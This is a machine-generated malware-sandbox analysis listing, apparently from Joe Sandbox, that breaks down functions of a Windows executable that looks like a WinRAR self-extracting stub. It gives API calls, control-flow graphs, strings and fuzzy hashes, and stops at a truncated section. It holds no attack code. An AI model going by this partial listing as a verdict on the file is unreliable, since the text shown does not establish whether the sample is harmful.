                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A3CFA8
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A3CFB7
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D064
                                                                                              • _wcslen.LIBCMT ref: 00A3D0BA
                                                                                              • _swprintf.LIBCMT ref: 00A3D0E4
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A3D12E
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00A3D148
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00A3D151
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A3D167
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00A3D181
                                                                                              • SetWindowTextW.USER32(00000000,00A7389A), ref: 00A3D1A3
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A3D203
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D216
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 00A3D2B9
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A3D393
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A3D3D5
                                                                                                • Part of subcall function 00A3D884: __EH_prolog.LIBCMT ref: 00A3D889
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3D3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3103142498-1645151803
                                                                                              • Opcode ID: 73ac00857137155291eb795d18160d54e5920accf4f6dfce7d13e7517096472c
                                                                                              • Instruction ID: d0f84fe3ac984f28e10e468d99a3051b21933041476d67205a1f732e0d31b309
                                                                                              • Opcode Fuzzy Hash: 73ac00857137155291eb795d18160d54e5920accf4f6dfce7d13e7517096472c
                                                                                              • Instruction Fuzzy Hash: 7A42E271940314BEEB21EBF4AD4EFBE7ABCAB11704F044165F645B60D2CBB44E468B22
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A31B83 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 272 a31b83-a31ba6 call a3ffd0 GetModuleHandleW 275 a31c07-a31e68 272->275 276 a31ba8-a31bbf GetProcAddress 272->276 277 a31f34-a31f60 GetModuleFileNameW call a2d6a7 call a3192f 275->277 278 a31e6e-a31e79 call a489ee 275->278 279 a31bc1-a31bd7 276->279 280 a31bd9-a31be9 GetProcAddress 276->280 294 a31f62-a31f6e call a2c619 277->294 278->277 289 a31e7f-a31ead GetModuleFileNameW CreateFileW 278->289 279->280 282 a31c05 280->282 283 a31beb-a31c00 280->283 282->275 283->282 292 a31f28-a31f2f CloseHandle 289->292 293 a31eaf-a31ebb SetFilePointer 289->293 292->277 293->292 295 a31ebd-a31ed9 ReadFile 293->295 301 a31f70-a31f7b call a31b3b 294->301 302 a31f9d-a31fc4 call a2d71d GetFileAttributesW 294->302 295->292 298 a31edb-a31f00 295->298 300 a31f1d-a31f26 call a3169e 298->300 300->292 309 a31f02-a31f1c call a31b3b 300->309 301->302 311 a31f7d-a31f9b CompareStringW 301->311 312 a31fc6-a31fca 302->312 313 a31fce 302->313 309->300 311->302 311->312 312->294 316 a31fcc 312->316 314 a31fd0-a31fd5 313->314 317 a31fd7 314->317 318 a3200c-a3200e 314->318 316->314 319 a31fd9-a32000 call a2d71d GetFileAttributesW 317->319 320 a32014-a3202b call a2d6f1 call a2c619 318->320 321 a3211b-a32125 318->321 326 a32002-a32006 319->326 327 a3200a 319->327 331 a32093-a320c6 call a24a20 AllocConsole 320->331 332 a3202d-a3208e call a31b3b * 2 call a2f937 call a24a20 call a2f937 call a3b7f4 320->332 326->319 329 a32008 326->329 327->318 329->318 338 a32113-a32115 ExitProcess 331->338 339 a320c8-a3210d GetCurrentProcessId AttachConsole call a44fa3 GetStdHandle WriteConsoleW Sleep FreeConsole 331->339 332->338 339->338
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00A31B9C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A31BAE
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A31BDF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A31E89
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A31EA3
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A31EB3
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00A54D24,00000000), ref: 00A31ED1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A31F29
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A31F3E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A54D24,?,00000000,?,00000800), ref: 00A31F92
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00A54D24,00000800,?,00000000,?,00000800), ref: 00A31FBC
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00A54DEC,00000800), ref: 00A31FF8
                                                                                                • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                                • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              • _swprintf.LIBCMT ref: 00A3206A
                                                                                              • _swprintf.LIBCMT ref: 00A320B6
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • AllocConsole.KERNEL32 ref: 00A320BE
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00A320C8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00A320CF
                                                                                              • _wcslen.LIBCMT ref: 00A320E4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A320F5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00A320FC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00A32107
                                                                                              • FreeConsole.KERNEL32 ref: 00A3210D
                                                                                              • ExitProcess.KERNEL32 ref: 00A32115
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: f26d0fdc00d6d9cb054c57cdc9874f097e5091f70b28b1148683a6ded9fd1bf5
                                                                                              • Instruction ID: ebe2bbaa87a3a3c68d4488d060965aa91703230180af81cf404bc8bdb764e2bc
                                                                                              • Opcode Fuzzy Hash: f26d0fdc00d6d9cb054c57cdc9874f097e5091f70b28b1148683a6ded9fd1bf5
                                                                                              • Instruction Fuzzy Hash: 92D185B1408744AFD330DFA0D859BDFBBE8BB8870AF50091DFA8596190DBB4858DCB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A2ED90
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A2EDCC
                                                                                                • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A2CF18,00000000,?,?), ref: 00A32EEE
                                                                                              • _wcslen.LIBCMT ref: 00A2F109
                                                                                              • __fprintf_l.LIBCMT ref: 00A2F23C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 5d0e8339497ad167be30f3eafc6f45c93f7eb08558b834ed6d293fc2571b65f4
                                                                                              • Instruction ID: 8c553c016654f0f4e21dafa645ef72068f1cdd134ebad47ac5137b29b44a42d4
                                                                                              • Opcode Fuzzy Hash: 5d0e8339497ad167be30f3eafc6f45c93f7eb08558b834ed6d293fc2571b65f4
                                                                                              • Instruction Fuzzy Hash: 8232CE71900228AFDF24EF68E941AEE77B4FF48704F40457AFA069B291E7719D85CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3E619 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                                • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                                • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                                • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                                • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              • GetDlgItem.USER32(00000068,00A81CF0), ref: 00A3E62D
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00A3C9A9,00A560F0,00A81CF0,00A81CF0,00001000,?,00000000,?), ref: 00A3E655
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A3E660
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00A545F4), ref: 00A3E66E
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A3E684
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A3E69E
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A3E6E2
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A3E6F0
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A3E6FF
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A3E726
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00A5549C), ref: 00A3E735
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 2ec1c27a9aec1390717250c2872787286cf2e6bca666d96ef6ddcae6bd99b5a1
                                                                                              • Instruction ID: bde059527568fc3544f8dcd21fdab0ffaec6586d80884d65022d4c2231076b40
                                                                                              • Opcode Fuzzy Hash: 2ec1c27a9aec1390717250c2872787286cf2e6bca666d96ef6ddcae6bd99b5a1
                                                                                              • Instruction Fuzzy Hash: 11310771985B40BFD301EF70DC4EFAB3FACFB52704F000A08F99196190C7A5590A8B66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3E8DF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 667 a3e8df-a3e8f7 call a3ffd0 670 a3eb38-a3eb40 667->670 671 a3e8fd-a3e909 call a44fa3 667->671 671->670 674 a3e90f-a3e937 call a411b0 671->674 677 a3e941-a3e94f 674->677 678 a3e939 674->678 679 a3e962-a3e968 677->679 680 a3e951-a3e954 677->680 678->677 682 a3e9ab-a3e9ae 679->682 681 a3e958-a3e95e 680->681 683 a3e960 681->683 684 a3e987-a3e994 681->684 682->681 685 a3e9b0-a3e9b6 682->685 686 a3e972-a3e97c 683->686 687 a3eb10-a3eb12 684->687 688 a3e99a-a3e99e 684->688 689 a3e9b8-a3e9bb 685->689 690 a3e9bd-a3e9bf 685->690 691 a3e96a-a3e970 686->691 692 a3e97e 686->692 693 a3eb16 687->693 688->693 694 a3e9a4-a3e9a9 688->694 689->690 695 a3e9d2-a3e9e8 call a2cd5c 689->695 690->695 696 a3e9c1-a3e9c8 690->696 691->686 698 a3e980-a3e983 691->698 692->684 701 a3eb1f 693->701 694->682 702 a3ea01-a3ea0c call a2b4c1 695->702 703 a3e9ea-a3e9f7 call a33316 695->703 696->695 699 a3e9ca 696->699 698->684 699->695 704 a3eb26-a3eb28 701->704 713 a3ea29-a3ea36 ShellExecuteExW 702->713 714 a3ea0e-a3ea25 call a2cad4 702->714 703->702 712 a3e9f9 703->712 707 a3eb37 704->707 708 a3eb2a-a3eb2c 704->708 707->670 708->707 711 a3eb2e-a3eb31 ShowWindow 708->711 711->707 712->702 713->707 716 a3ea3c-a3ea49 713->716 714->713 718 a3ea4b-a3ea52 716->718 719 a3ea5c-a3ea5e 716->719 718->719 720 a3ea54-a3ea5a 718->720 721 a3ea60-a3ea69 IsWindowVisible 719->721 722 a3ea75-a3ea88 WaitForInputIdle call a3ed8b 719->722 720->719 723 a3eacb-a3ead7 CloseHandle 720->723 721->722 724 a3ea6b-a3ea73 ShowWindow 721->724 726 a3ea8d-a3ea94 722->726 727 a3ead9-a3eae6 call a33316 723->727 728 a3eae8-a3eaf6 723->728 724->722 726->723 730 a3ea96-a3ea9e 726->730 727->701 727->728 728->704 729 a3eaf8-a3eafa 728->729 729->704 732 a3eafc-a3eb02 729->732 730->723 733 a3eaa0-a3eab1 GetExitCodeProcess 730->733 732->704 735 a3eb04-a3eb0e 732->735 733->723 736 a3eab3-a3eabd 733->736 735->704 737 a3eac4 736->737 738 a3eabf 736->738 737->723 738->737
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A3E8FE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00A3EA2E
                                                                                              • IsWindowVisible.USER32(?), ref: 00A3EA61
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00A3EA6D
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00A3EA7E
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00A3EAA9
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A3EACF
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00A3EB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 3646668279-3750412487
                                                                                              • Opcode ID: d2f7ae28f3f08b4b537487b78965b8b3146dff7fc5bd4dd53bec46183fab096b
                                                                                              • Instruction ID: ea0837f375ce3fd60b684c15e8afbe0ddf381d34b29ee42d8c68f05e6486b43b
                                                                                              • Opcode Fuzzy Hash: d2f7ae28f3f08b4b537487b78965b8b3146dff7fc5bd4dd53bec46183fab096b
                                                                                              • Instruction Fuzzy Hash: 6351E1705483809EDB31DF64D844BABBBE5BF84784F08481DF9C5971D0EB718896CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4BB1B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 a4bb1b-a4bb34 765 a4bb36-a4bb46 call a5010c 764->765 766 a4bb4a-a4bb4f 764->766 765->766 773 a4bb48 765->773 768 a4bb51-a4bb59 766->768 769 a4bb5c-a4bb80 MultiByteToWideChar 766->769 768->769 771 a4bb86-a4bb92 769->771 772 a4bd13-a4bd26 call a40d7c 769->772 774 a4bb94-a4bba5 771->774 775 a4bbe6 771->775 773->766 778 a4bbc4-a4bbd5 call a4a7fe 774->778 779 a4bba7-a4bbb6 call a531d0 774->779 777 a4bbe8-a4bbea 775->777 782 a4bbf0-a4bc03 MultiByteToWideChar 777->782 783 a4bd08 777->783 778->783 789 a4bbdb 778->789 779->783 792 a4bbbc-a4bbc2 779->792 782->783 786 a4bc09-a4bc1b call a4c12c 782->786 787 a4bd0a-a4bd11 call a4bd83 783->787 794 a4bc20-a4bc24 786->794 787->772 793 a4bbe1-a4bbe4 789->793 792->793 793->777 794->783 796 a4bc2a-a4bc31 794->796 797 a4bc33-a4bc38 796->797 798 a4bc6b-a4bc77 796->798 797->787 801 a4bc3e-a4bc40 797->801 799 a4bcc3 798->799 800 a4bc79-a4bc8a 798->800 804 a4bcc5-a4bcc7 799->804 802 a4bca5-a4bcb6 call a4a7fe 800->802 803 a4bc8c-a4bc9b call a531d0 800->803 801->783 805 a4bc46-a4bc60 call a4c12c 801->805 808 a4bd01-a4bd07 call a4bd83 802->808 820 a4bcb8 802->820 803->808 818 a4bc9d-a4bca3 803->818 804->808 809 a4bcc9-a4bce2 call a4c12c 804->809 805->787 817 a4bc66 805->817 808->783 809->808 821 a4bce4-a4bceb 809->821 817->783 822 a4bcbe-a4bcc1 818->822 820->822 823 a4bd27-a4bd2d 821->823 824 a4bced-a4bcee 821->824 822->804 825 a4bcef-a4bcff WideCharToMultiByte 823->825 824->825 825->808 826 a4bd2f-a4bd36 call a4bd83 825->826 826->787
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A469A3,00A469A3,?,?,?,00A4BD6C,00000001,00000001,62E85006), ref: 00A4BB75
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A4BD6C,00000001,00000001,62E85006,?,?,?), ref: 00A4BBFB
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A4BCF5
                                                                                              • __freea.LIBCMT ref: 00A4BD02
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              • __freea.LIBCMT ref: 00A4BD0B
                                                                                              • __freea.LIBCMT ref: 00A4BD30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: e74deb7da6cab390dedb040b0158f53645ce016ef297359e5a32285e96c221e8
                                                                                              • Instruction ID: 6c8ac613347950dc904ccbd2dd92fa4ef438d20da25720615e786a9015b76cee
                                                                                              • Opcode Fuzzy Hash: e74deb7da6cab390dedb040b0158f53645ce016ef297359e5a32285e96c221e8
                                                                                              • Instruction Fuzzy Hash: 3C51D17AA20216ABEB258F64CC81EBF77A9EFC4754F154668FC04D6150EB35DC81C6B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C324 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 829 a3c324-a3c342 GetCurrentProcess OpenProcessToken 830 a3c3a7 829->830 831 a3c344-a3c35c GetTokenInformation 829->831 832 a3c3a9-a3c3ab 830->832 833 a3c369-a3c38a call a47566 GetTokenInformation 831->833 834 a3c35e-a3c367 GetLastError 831->834 837 a3c39b-a3c3a5 call a45219 833->837 838 a3c38c-a3c399 CopySid 833->838 834->830 834->833 837->832 838->837
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00020008,00A3BF14,?,?,?,?,00A3BF14,?), ref: 00A3C333
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00A3BF14,?), ref: 00A3C33A
                                                                                              • GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C354
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A3BF14,?), ref: 00A3C35E
                                                                                              • GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,00A3BF14,?), ref: 00A3C382
                                                                                              • CopySid.ADVAPI32(00000044,00A3BF14,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3984476752-0
                                                                                              • Opcode ID: 0515aeece10fdeff64b9afc6987aacd12c747717110791900338786353810fbd
                                                                                              • Instruction ID: 4f43199009c690a9a10c55b7531a32d5fe7fd0d6efcde55503049540ff9acf43
                                                                                              • Opcode Fuzzy Hash: 0515aeece10fdeff64b9afc6987aacd12c747717110791900338786353810fbd
                                                                                              • Instruction Fuzzy Hash: 4D012975940208BFDB119BE0EC89EEEBBBDEF09764F104055FA06E5150D6718A91AB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3ED8B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 841 a3ed8b-a3eda4 WaitForSingleObject 842 a3eda6-a3eda7 841->842 843 a3edec-a3edee 841->843 844 a3eda9-a3edb9 PeekMessageW 842->844 845 a3edbb-a3edd6 GetMessageW TranslateMessage DispatchMessageW 844->845 846 a3eddc-a3ede9 WaitForSingleObject 844->846 845->846 846->844 847 a3edeb 846->847 847->843
                                                                                              APIs
